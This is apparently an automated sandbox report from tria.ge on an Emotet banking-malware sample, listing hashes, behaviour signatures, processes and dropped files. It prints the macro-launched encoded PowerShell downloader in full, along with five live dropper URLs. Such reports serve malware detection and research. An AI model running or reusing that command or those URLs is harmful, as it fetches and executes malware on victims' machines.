Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    424s
  • max time network
    432s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    18/01/2025, 15:03

General

  • Target

    The-MALWARE-Repo-master/Banking-Malware/Emotet.zip

  • Size

    102KB

  • MD5

    510f114800418d6b7bc60eebd1631730

  • SHA1

    acb5bc4b83a7d383c161917d2de137fd6358aabd

  • SHA256

    f62125428644746f081ca587ffa9449513dd786d793e83003c1f9607ca741c89

  • SHA512

    6fe51c58a110599ea5d7f92b4b17bc2746876b4b5b504e73d339776f9dfa1c9154338d6793e8bf75b18f31eb677afd3e0c1bd33e40ac58e8520acbb39245af1a

  • SSDEEP

    3072:N3HIYWf7q41qPhYhIYCjvqSrBlh2iui/EJEZ6yQ:N3HfWf75qPhYhIdjvqS4McJIW

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\The-MALWARE-Repo-master\Banking-Malware\Emotet.zip"
    1⤵
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1016
    • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7zO8F3BCE58\[email protected]" /o ""
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2364
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:2056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4784

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D9310D61.wmf

      Filesize

      430B

      MD5

      a622808c969c86bd6da92dd93ecc6885

      SHA1

      117b981f729641338c0389a24bfa1e9c994afb8d

      SHA256

      6d5c5afb74b021de88bc0127a264024594cf6e41341e7f2721fe25b5b6b56f4a

      SHA512

      9432ee64a621e7d3ec4e7b44252bc0463b27288abc3e520e67f33355143a852c2b34d1f8957f5ca08ea8dbff240c126740dc8f9cd45444d2167f836bb4409446

    • C:\Users\Admin\AppData\Local\Temp\7zO8F3BCE58\[email protected]

      Filesize

      139KB

      MD5

      b92021ca10aed3046fc3be5ac1c2a094

      SHA1

      0fb1ad5b53cdd09a7268c823ec796a6e623f086f

      SHA256

      c378387344e0a552dc065de6bfa607fd26e0b5c569751c79fbf9c6f2e91c9807

      SHA512

      bbeb5cfd7c5a890456b0805234a9ae325abc4a08dbad70b4ed1b3635dee4470a1f86869d5532809cecb595b9a89708f378921d733bd061aef693bfc5ee77ebb4

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3qp1yfpp.f4u.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      16B

      MD5

      d29962abc88624befc0135579ae485ec

      SHA1

      e40a6458296ec6a2427bcb280572d023a9862b31

      SHA256

      a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

      SHA512

      4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

      Filesize

      1KB

      MD5

      8c680180dce50c6c9937f94b7c9ae610

      SHA1

      72e8e3fd17565021e53ab7aa7e58e201b45eee23

      SHA256

      b6cfc2c493bd36f05ca3e12e2dc984e4a385c0f923fc3d1ef9602f06ea596d8d

      SHA512

      ce0e9443f2b6f7ff43664941965a96ae59066cc196844869b9e1810e89d2e31209975ecadaea112cc6a1b00a1715184aeba40ee3ebdd015d6bebe8318dbf570e

    • memory/2364-32-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-22-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-19-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-20-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-23-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-24-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-25-0x00007FFF6E190000-0x00007FFF6E1A0000-memory.dmp

      Filesize

      64KB

    • memory/2364-27-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-29-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-30-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-28-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-26-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-33-0x00007FFF6E190000-0x00007FFF6E1A0000-memory.dmp

      Filesize

      64KB

    • memory/2364-35-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-34-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-17-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-31-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-16-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

      Filesize

      64KB

    • memory/2364-21-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-18-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

      Filesize

      64KB

    • memory/2364-14-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

      Filesize

      64KB

    • memory/2364-291-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-15-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

      Filesize

      64KB

    • memory/2364-12-0x00007FFFB02CD000-0x00007FFFB02CE000-memory.dmp

      Filesize

      4KB

    • memory/2364-232-0x00007FFFB02CD000-0x00007FFFB02CE000-memory.dmp

      Filesize

      4KB

    • memory/2364-233-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-234-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-235-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-236-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

      Filesize

      2.0MB

    • memory/2364-13-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

      Filesize

      64KB

    • memory/2364-288-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

      Filesize

      64KB

    • memory/2364-290-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

      Filesize

      64KB

    • memory/2364-289-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

      Filesize

      64KB

    • memory/2364-287-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

      Filesize

      64KB

    • memory/4784-192-0x0000023E44750000-0x0000023E44772000-memory.dmp

      Filesize

      136KB